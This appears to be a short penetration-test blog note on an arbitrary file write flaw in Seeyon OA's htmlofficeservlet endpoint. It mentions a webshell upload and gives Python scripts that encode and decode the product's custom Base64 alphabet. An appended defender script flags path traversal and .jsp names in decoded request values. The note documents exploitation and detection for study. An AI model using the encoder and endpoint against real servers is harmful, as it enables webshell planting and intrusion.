20201312 Seeyon OA Arbitrary File Write Vulnerability

December 14, 2020

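I came across this environment during a penetration test and found the vulnerability information on the Internet; I am recording it here.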

!!! Everything here was done in an internal test environment, and it contains no sensitive information !!!

A simple verification of the environment: /seeyon/htmlofficeservlet

Exploitation:

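Here my file was uploaded successfully, but null was returned. I guess there may have been a problem with the webshell, but because of time constraints I did not do much testing; I only explored the encryption scheme afterwards and finally found the decryption method at https://paper.seebug.org/964/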

Python scripts
Decryption script:

```python
import base64
#sakuradied

def en(Str):
    # code: custom alphabet; code1: standard Base64 alphabet ("=" included)
    code = """gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"""
    code1 = """ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="""
    w = ''
    # Map each character from the custom alphabet back to the standard one;
    # characters outside the alphabet are skipped
    for a in Str:
        ii = code.find(a)
        if ii != -1:
            w = w + code1[ii]
    try:
        ba64 = base64.b64decode(w)
        print(ba64.decode())
    except Exception as err:
        # Message: "Failed, please check that your input is correct; the error is:"
        print("失败,请检查您输入的是否正确,错误信息为:", err)


if __name__ == "__main__":
    # "输入>>" is the prompt ("Input>>"). The input is the already-encoded string,
    # so it is passed on directly and not Base64-encoded again.
    Str = input("输入>>")
    en(Str)
```

Encryption script:

```python
#!/usr/bin/python3
import base64
#sakuradied

def en(Str):
    # code1: custom alphabet; code: standard Base64 alphabet ("=" included)
    code1 = """gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"""
    code = """ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="""
    w = ''
    # Replace each standard Base64 character with the custom one at the same index
    for a in Str:
        ii = code.find(a)
        if ii != -1:
            w = w + code1[ii]
    print(w)


if __name__ == "__main__":
    # "输入>>" is the prompt ("Input>>"); the plaintext is Base64-encoded first
    Str = input("输入>>")
    Str = base64.b64encode(Str.encode('utf-8'))
    Str = Str.decode()
    en(Str)
```

I wrote this casually, so it is rather messy.
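A defender-side use of the same alphabet mapping, as an added example that is not part of the original post: it decodes the values in a logged request body and flags decoded text that looks like a path traversal or a JSP file name. The `key=value` line format, the field names, the sample values and the `SUSPICIOUS` pattern are assumptions made for illustration.

```python
import base64
import re

# Alphabets exactly as in the scripts on this page ("=" takes part in the mapping)
CUSTOM = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
TO_STANDARD = str.maketrans(CUSTOM, STANDARD)
TO_CUSTOM = str.maketrans(STANDARD, CUSTOM)

# Assumption: decoded values worth flagging contain path traversal or a JSP file name
SUSPICIOUS = re.compile(r"\.\.[\\/]|\.jspx?\b", re.IGNORECASE)


def decode_value(token):
    """Return the decoded text, or None if the token does not decode cleanly."""
    try:
        raw = base64.b64decode(token.translate(TO_STANDARD), validate=True)
        text = raw.decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text and text.isprintable() else None


def encode_value(text):
    """Encoder, used here only to build the constructed sample below."""
    return base64.b64encode(text.encode("utf-8")).decode().translate(TO_CUSTOM)


def triage(body):
    """Decode each key=value line of a logged body; return (key, text, flagged)."""
    findings = []
    for line in body.splitlines():
        key, sep, value = line.partition("=")
        decoded = decode_value(value.strip()) if sep else None
        if decoded is not None:
            findings.append((key, decoded, bool(SUSPICIOUS.search(decoded))))
    return findings


# Constructed sample: field names and values are placeholders, not a real request
SAMPLE = "fieldA={}\r\nfieldB={}\r\nfieldC=plain text\r\n".format(
    encode_value("..\\..\\placeholder\\test123456.jsp"),
    encode_value("2020-12-14 10:00:00"),
)

if __name__ == "__main__":
    for key, decoded, flagged in triage(SAMPLE):
        print(key, "SUSPICIOUS" if flagged else "ok", decoded)
```

Because "=" is part of the mapping, Base64 padding appears as "6" in encoded values, so a trailing "6" or "66" is a quick visual hint that a value uses this alphabet.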

References:
https://paper.seebug.org/964/
https://www.adminxe.com/1147.html